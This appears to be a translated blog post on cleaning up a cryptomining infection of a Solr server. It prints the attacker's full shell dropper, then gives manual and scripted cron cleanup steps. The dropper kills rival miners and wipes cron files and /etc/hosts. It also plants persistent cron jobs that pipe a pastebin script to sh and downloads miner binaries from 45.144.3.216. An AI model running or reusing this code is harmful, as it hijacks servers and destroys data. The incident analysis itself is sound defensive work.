Notes on a Solr cryptomining virus incident
阿新 • Published: 2022-12-06
1 The virus appears
2 Later, a cron job was found
3 Visiting the URL to inspect it
4 Pulling the script down
#!/bin/sh
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
ps aux | grep -v grep | grep 'givemexyz' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'dbuse' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'kdevtmpfsi' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'javaupDates' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'kinsing' | awk '{print $2}' | xargs -I % kill -9 %
killall /tmp/*
killall /tmp/.*
killall /var/tmp/*
killall /var/tmp/.*
pgrep JavaUpdate | xargs -I % kill -9 %
pgrep kinsing | xargs -I % kill -9 %
pgrep donate | xargs -I % kill -9 %
pgrep kdevtmpfsi | xargs -I % kill -9 %
pgrep sysupdate | xargs -I % kill -9 %
pgrep mysqlserver | xargs -I % kill -9 %
chattr -ia /var/spool/cron/root
crontab -r
crontab -l | grep -e "xg546sAd" | grep -v grep
if [ $? -eq 0 ]; then
    echo "cron good"
else
    ( crontab -l 2>/dev/null
      echo "*/5 * * * * curl -fsSL https://pastebin.com/raw/xg546sAd | sh" ) | crontab -
fi
rm -f /tmp/*
rm -f /tmp/.sola
s2=`whoami`
if [ `whoami` = "root" ]; then
    chattr -ia /etc/cron.d/*
    rm -rf /etc/cron.d/*
    chattr -i /var/spool/cron/crontabs/root
    chattr -i /usr/local/bin/dns
    rm -f /etc/cron.hourly/oanacroner
    rm -f /etc/cron.hourly/oanacrona
    rm -f /etc/cron.daily/oanacroner
    rm -f /etc/cron.daily/oanacrona
    rm -f /etc/cron.monthly/oanacroner
    rm -f /usr/local/bin/dns
    rm -f /etc/update.sh
    chattr -ia /etc/hosts
    echo >/etc/hosts
    chattr +ia /etc/hosts
    chattr -i /etc/sysupdate
    rm -f /etc/sysupdate
    rm -f /etc/config.json
    rm -f /var/tmp/kworkerds
    rm -f /usr/bin/.systemcero
    rm -f /usr/bin/cloudupdate
    rm -f /usr/bin/diskmanagerd
    rm -f /lib/libterminfo.so
    rm -f /bin/httpsntp
    rm -f /bin/ftpsntp
    rm -f /var/tmp/jspserv
    rm -f /usr/sbin/cron
    rm -f /usr/bin/kinsing*
    rm -f /etc/cron.d/kinsing*
    rm -f /usr/bin/node
    chattr -isa /var/spool/cron/*
    rm -rf /var/spool/cron/*
    chattr +isa /tmp/xms
    rm -f /var/tmp/kinsing
    chattr -ia /etc/crontab
    echo '*/10 * * * * root curl -fsSL https://pastebin.com/raw/xg546sAd | sh' > /etc/crontab
    chattr +ia /etc/crontab
    chattr -ia /var/spool/cron/root
    chattr -ia /var/spool/cron/crontabs/root
    echo '*/10 * * * * curl -fsSL https://pastebin.com/raw/xg546sAd | bash' >/var/spool/cron/root
    echo '*/10 * * * * curl -fsSL https://pastebin.com/raw/xg546sAd | bash' >/var/spool/cron/crontabs/root
    echo '*/10 * * * * root curl -fsSL https://pastebin.com/raw/xg546sAd | sh' > /etc/cron.d/root
    chattr +ia /var/spool/cron/root
    chattr +ia /etc/cron.d/root
    chattr +ia /var/spool/cron/crontabs/root
else
    ps aux | grep -v 'java\|redis\|weblogic\|mongod\|mysql\|oracle\|tomcat\|grep\|postgres\|atlassian\|awk\|sbin\|WebLogic.sh\|solr\|server\|aux\|httpd\|sh\|sbin|' | grep ${s2:0:7} | awk '{print $2}' | xargs -I % kill -9 %
    ps aux | grep -v 'java\|redis\|weblogic\|mongod\|mysql\|oracle\|tomcat\|grep\|postgres\|atlassian\|awk\|sbin\|WebLogic.sh\|solr\|server\|aux\|httpd\|sh\|defunct\|sbin|' | grep $s2 | awk '{print $2}' | xargs -I % kill -9 %
fi
chmod +777 /tmp/*
pkill networkservice
pkill networkser+
pkill watchbog
pkill xmrig
rm -rf /tmp/.solr
mkdir /tmp/.solr
p=$(ps auxf|grep solrd|awk '{if($3>=60.0) print $2}')
name=""$p
if [ -z "$name" ]
then
    pkill solr.sh
    pkill solrd
    ps aux | grep -v grep | grep -v 'java\|redis\|mongod\|mysql\|oracle\|tomcat\|grep\|postgres\|confluence\|awk\|aux\|sh' | awk '{if($3>60.0) print $2}' | xargs -I % kill -9 %
    rm -rf /tmp/.solr
    mkdir /tmp/.solr
    chmod +rwx /tmp/.solr
    curl -fsSL http://45.144.3.216:10000/starrail/config/config.json -o /tmp/.solr/config.json
    curl -fsSL http://45.144.3.216:10000/starrail/cbt2zip/setup.exe -o /tmp/.solr/solrd
    curl -fsSL http://45.144.3.216:10000/solr.sh -o /tmp/.solr/solr.sh
    curl -fsSL http://45.144.3.216:10000/genshin -o /tmp/.solr/genshin
    chmod +x /tmp/.solr/genshin
    chmod +x /tmp/.solr/solrd
    chmod +x /tmp/.solr/solr.sh
    nohup /tmp/.solr/solr.sh &>>/dev/null &
    sleep 10
    rm -f /tmp/.solr/solr.sh
else
    exit
fi
It turned out to have set up 5 cron jobs on the system, and at the same time it made the cron files read-only (immutable); there was also a hidden folder .solr in the tmp directory.
5 Handling (its scheduling period is 10 seconds; if you deal with the items one by one by hand, the other scheduled tasks will most likely have re-created the earlier cron jobs before you finish, so the handling was changed to a batch script)
kill -9 11779
kill -9 11773
kill -9 11423
kill -9 11507
kill -9 11508
rm -rf /tmp/.solr
chattr -ia /etc/crontab
chattr -ia /var/spool/cron/root
chattr -ia /var/spool/cron/crontabs/root
chattr -ia /etc/cron.d/root
chattr -ia /var/spool/cron/root
cat /dev/null > /etc/crontab
cat /dev/null > /var/spool/cron/root
cat /dev/null > /var/spool/cron/crontabs/root
cat /dev/null > /etc/cron.d/root
cat /dev/null > /var/spool/cron/root
chattr +ia /etc/crontab
chattr +ia /var/spool/cron/root
chattr +ia /var/spool/cron/crontabs/root
chattr +ia /etc/cron.d/root
chattr +ia /var/spool/cron/root
First kill all of the virus processes, then delete the host folder, then clear the read-only attribute on the cron files, empty them in batch, and put the read-only attribute back; change it back later once the server's security has been hardened. Also, if there are other cron jobs, remember to save them first.
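The batch cleanup above empties every cron file outright, which is why the post reminds you to save legitimate jobs first. As an added example that is not part of the original post, the script below does the same cleanup surgically: it backs up each of the cron locations the dropper writes, removes only the lines carrying the dropper's own indicators (the pastebin paste id and download host from the script above), and re-applies the immutable flag as the post does until the host is hardened. It assumes GNU chattr/lsattr, root privileges for --run, and a backup directory of /root/cron-backups.

```shell
#!/bin/sh
# Added example (not from the original post): surgical cron cleanup for the
# dropper shown above. IOC_PATTERN holds the paste id and download host from
# that script; CRON_FILES are the locations it writes. BACKUP_DIR is assumed.
IOC_PATTERN='pastebin\.com/raw/xg546sAd|45\.144\.3\.216'
CRON_FILES="/etc/crontab /etc/cron.d/root /var/spool/cron/root /var/spool/cron/crontabs/root"
BACKUP_DIR="/root/cron-backups"

# Print the lines of cron file $1 that match the indicators; exit 1 if none.
find_cron_iocs() {
    grep -E "$IOC_PATTERN" "$1"
}

# Copy $1 to $2 without the indicator lines; print how many lines were dropped.
strip_cron_iocs() {
    grep -Ev "$IOC_PATTERN" "$1" > "$2" || true   # grep -v exits 1 when nothing survives
    echo $(( $(wc -l < "$1") - $(wc -l < "$2") ))
}

# Clean one cron file in place (needs root): back it up first, clear the
# immutable/append-only flags the dropper sets, rewrite it, then relock it as
# the post does. Files that carry no indicators are left untouched.
clean_cron_file() {
    f="$1"
    [ -f "$f" ] || return 0
    find_cron_iocs "$f" > /dev/null || return 0
    mkdir -p "$BACKUP_DIR"
    backup="$BACKUP_DIR/$(date +%Y%m%d-%H%M%S)$(echo "$f" | tr / _)"
    cp -p "$f" "$backup"
    chattr -ia "$f"
    tmp=$(mktemp)
    removed=$(strip_cron_iocs "$f" "$tmp")
    cat "$tmp" > "$f"          # rewrite contents, keeping the inode, owner and mode
    rm -f "$tmp"
    chattr +ia "$f"
    echo "$f: removed $removed line(s); original saved to $backup"
}

# `sh cron_triage.sh --scan` reports matches and flags without changing anything;
# `sh cron_triage.sh --run` (as root) cleans every listed file.
case "${1:-}" in
    --scan) for f in $CRON_FILES; do
                [ -f "$f" ] || continue
                lsattr "$f"; find_cron_iocs "$f" || echo "$f: no indicators"
            done ;;
    --run)  for f in $CRON_FILES; do clean_cron_file "$f"; done ;;
esac
```

Run --scan first and compare its output with the five entries the post found before running --run; anything the pattern does not match stays in place, so extend IOC_PATTERN if a variant uses a different paste or host.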